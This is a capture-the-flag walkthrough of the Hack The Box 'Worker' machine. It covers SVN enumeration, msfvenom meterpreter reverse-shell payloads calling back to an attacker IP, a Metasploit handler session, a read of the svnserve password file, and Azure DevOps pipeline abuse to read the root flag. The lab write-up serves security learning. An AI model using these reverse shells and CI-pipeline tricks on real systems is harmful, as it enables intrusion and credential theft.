# Nmap 7.80 scan initiated Tue Oct 20 20:33:43 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.10.203 Nmap scan report for 10.10.10.203 Host is up (0.023s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3690/tcp open svnserve Subversion 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Oct 20 20:35:39 2020 -- 1 IP address (1 host up) scanned in 115.81 seconds
On port 3690 we have a SVN server. 3690 is the default port for
svnserve service.
svnserve allows access to Subversion repositories using Subversion's custom network protocol.
You can run svnserve as a standalone server process (for clients that are using the svn:// access method); you can have a daemon such as inetd or xinetd launch it for you on demand (also for svn://), or you can have sshd launch it on demand for the svn+ssh:// access method.
So let's find some information:
1 2 3 4 5 6 7 8 9 10 11
$ svn info svn://worker.htb Path: . URL: svn://worker.htb Relative URL: ^/ Repository Root: svn://worker.htb Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1 Revision: 5 Node Kind: directory Last Changed Author: nathen Last Changed Rev: 5 Last Changed Date: 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020)
$ mkdir svn && cd svn && svn export --force svn://worker.htb A . A dimension.worker.htb A dimension.worker.htb/LICENSE.txt A dimension.worker.htb/README.txt A dimension.worker.htb/assets A dimension.worker.htb/assets/css A dimension.worker.htb/assets/css/fontawesome-all.min.css A dimension.worker.htb/assets/css/main.css A dimension.worker.htb/assets/css/noscript.css A dimension.worker.htb/assets/js A dimension.worker.htb/assets/js/breakpoints.min.js A dimension.worker.htb/assets/js/browser.min.js A dimension.worker.htb/assets/js/jquery.min.js A dimension.worker.htb/assets/js/main.js A dimension.worker.htb/assets/js/util.js A dimension.worker.htb/assets/sass A dimension.worker.htb/assets/sass/base A dimension.worker.htb/assets/sass/base/_page.scss A dimension.worker.htb/assets/sass/base/_reset.scss A dimension.worker.htb/assets/sass/base/_typography.scss A dimension.worker.htb/assets/sass/components A dimension.worker.htb/assets/sass/components/_actions.scss A dimension.worker.htb/assets/sass/components/_box.scss A dimension.worker.htb/assets/sass/components/_button.scss A dimension.worker.htb/assets/sass/components/_form.scss A dimension.worker.htb/assets/sass/components/_icon.scss A dimension.worker.htb/assets/sass/components/_icons.scss A dimension.worker.htb/assets/sass/components/_image.scss A dimension.worker.htb/assets/sass/components/_list.scss A dimension.worker.htb/assets/sass/components/_table.scss A dimension.worker.htb/assets/sass/layout A dimension.worker.htb/assets/sass/layout/_bg.scss A dimension.worker.htb/assets/sass/layout/_footer.scss A dimension.worker.htb/assets/sass/layout/_header.scss A dimension.worker.htb/assets/sass/layout/_main.scss A dimension.worker.htb/assets/sass/layout/_wrapper.scss A dimension.worker.htb/assets/sass/libs A dimension.worker.htb/assets/sass/libs/_breakpoints.scss A dimension.worker.htb/assets/sass/libs/_functions.scss A dimension.worker.htb/assets/sass/libs/_mixins.scss A dimension.worker.htb/assets/sass/libs/_vars.scss A dimension.worker.htb/assets/sass/libs/_vendor.scss A dimension.worker.htb/assets/sass/main.scss A dimension.worker.htb/assets/sass/noscript.scss A dimension.worker.htb/assets/webfonts A dimension.worker.htb/assets/webfonts/fa-brands-400.eot A dimension.worker.htb/assets/webfonts/fa-brands-400.svg A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf A dimension.worker.htb/assets/webfonts/fa-brands-400.woff A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2 A dimension.worker.htb/assets/webfonts/fa-regular-400.eot A dimension.worker.htb/assets/webfonts/fa-regular-400.svg A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf A dimension.worker.htb/assets/webfonts/fa-regular-400.woff A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2 A dimension.worker.htb/assets/webfonts/fa-solid-900.eot A dimension.worker.htb/assets/webfonts/fa-solid-900.svg A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf A dimension.worker.htb/assets/webfonts/fa-solid-900.woff A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2 A dimension.worker.htb/images A dimension.worker.htb/images/bg.jpg A dimension.worker.htb/images/overlay.png A dimension.worker.htb/images/pic01.jpg A dimension.worker.htb/images/pic02.jpg A dimension.worker.htb/images/pic03.jpg A dimension.worker.htb/index.html A moved.txt Exported revision 5.
Let's see the first one, which is explicit:
1 2 3 4 5
$ cat moved.txt This repository has been migrated and will no longer be maintained here. You can find the latest version at: http://devops.worker.htb
// The Worker team :)
On the other repository we can find a showcase website that is listing some
projects and that can give us new sub-domains:
All those domains are hosting a web application and we can control the source,
so we'll be able to upload a reverse shell to the master branch and access it
wia the web application.
First, let's generate an ASPX reverse shell:
1 2 3 4 5 6 7
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f aspx > noraj.aspx Found 1 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none succeeded with size 510 (iteration=0) generic/none chosen with final size 510 Payload size: 510 bytes Final size of aspx file: 3663 bytes
Here a few steps I won't details too much.
Select a project, eg. Alpha
Create a new branch
Upload the reverse shell to the branch (eg. in assets folder)
Create a PR
Match merge policies: approve and link a work item
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.174 yes The listen address (an interface may be specified) LPORT 9999 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.174:9999 [*] Sending stage (201283 bytes) to 10.10.10.203 [*] Meterpreter session 1 opened (10.10.14.174:9999 -> 10.10.10.203:55557) at 2020-10-21 20:33:24 +0200
Elevation of Privilege (EoP): from iis apppool\defaultapppool to robisl#
1 2 3 4 5 6 7 8
meterpreter > shell Process 8920 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cat w:\svnrepos\www\conf\passwd ### This file is an example password file for svnserve. ### Its format is similar to that of svnserve.conf. As shown in the ### example below it contains one section labelled [users]. ### The name and password for each user follow, one account per line.
This time we don't have a PartsUnlimited sub-domain, there is a lot of files in
the repository but nothing seems useful.
As an everyday user of GitLab I know I can run some tests in a docker thanks
to the integrated GitLab CI pipeline (no need to configure an external CI) that
yo ucan configure through .gitlab-ci.yml.
It seems Azure Devops has a similar feature: New Pipeline > Azure Repos Git > PartsUnlimited > Starter Pipeline > azure-pipelines.yml.
We are welcomed with a default template:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
# Starter pipeline # Start with a minimal pipeline that you can customize to build and deploy your code. # Add steps that build, run tests, deploy, and more: # https://aka.ms/yaml
trigger: -master
pool:'Default'
steps: -script:echoHello,world! displayName:'Run a one-line script'
-script:| echo Add other tasks to build, test, and deploy your project. echo See https://aka.ms/yaml displayName:'Run a multi-line script'
Let's create a new reverse shell (an exe this time).
1 2 3 4 5 6
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f raw > noraj.exe Found 1 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none succeeded with size 510 (iteration=0) generic/none chosen with final size 510 Payload size: 510 bytes
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.174 yes The listen address (an interface may be specified) LPORT 9999 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
[evil-winrm][evil-winrm] allows us to upload a file:
1 2 3 4 5 6 7 8 9 10 11 12 13
*Evil-WinRM* PS C:\Users\robisl\Downloads> upload /home/noraj/CTF/HackTheBox/machines/Worker/noraj.exe Info: Uploading /home/noraj/CTF/HackTheBox/machines/Worker/noraj.exe to C:\Users\robisl\Downloads\noraj.exe
Data: 680 bytes of 680 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\robisl\Downloads> pwd
Path ---- C:\Users\robisl\Downloads
Now modify the template pipelien to
1 2 3 4 5 6 7 8 9 10 11 12 13
# Starter pipeline # Start with a minimal pipeline that you can customize to build and deploy your code. # Add steps that build, run tests, deploy, and more: # https://aka.ms/yaml
So I changed my template to the following and created a new pipeline:
1 2 3 4 5 6 7 8 9 10 11 12 13
# Starter pipeline # Start with a minimal pipeline that you can customize to build and deploy your code. # Add steps that build, run tests, deploy, and more: # https://aka.ms/yaml
Here is the execution of the pipeline task "noraj":
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
##[section]Starting: noraj ============================================================================== Task : Command line Description : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows Version : 2.151.1 Author : Microsoft Corporation Help : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line ============================================================================== Generating script. Script contents: C:\Users\robisl\Downloads\noraj.exe ========================== Starting Command Output =========================== ##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\31fb30ee-8d29-41e3-9ab0-529b331cef0e.cmd"" ##[error]This version of C:\Users\robisl\Downloads\noraj.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher. ##[error]Cmd.exe exited with code '1'. ##[section]Finishing: noraj
Seems to be the wrong architecture.
So I created a 32 bits reverse shell instead of a 64 bits one:
1 2 3 4 5 6
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f raw > noraj.exe Found 1 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none succeeded with size 341 (iteration=0) generic/none chosen with final size 341 Payload size: 341 bytes
Same error again, ok let's forget the shell, let's just display the root
flag.
##[section]Starting: noraj ============================================================================== Task : Command line Description : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows Version : 2.151.1 Author : Microsoft Corporation Help : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line ============================================================================== Generating script. Script contents: type C:\Users\Administrator\Desktop\root.txt ========================== Starting Command Output =========================== ##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\d9359887-a4ac-49ad-9865-3e9b9024f109.cmd"" c8d6aeda24c4e17abcc72f26dedbe919 ##[section]Finishing: noraj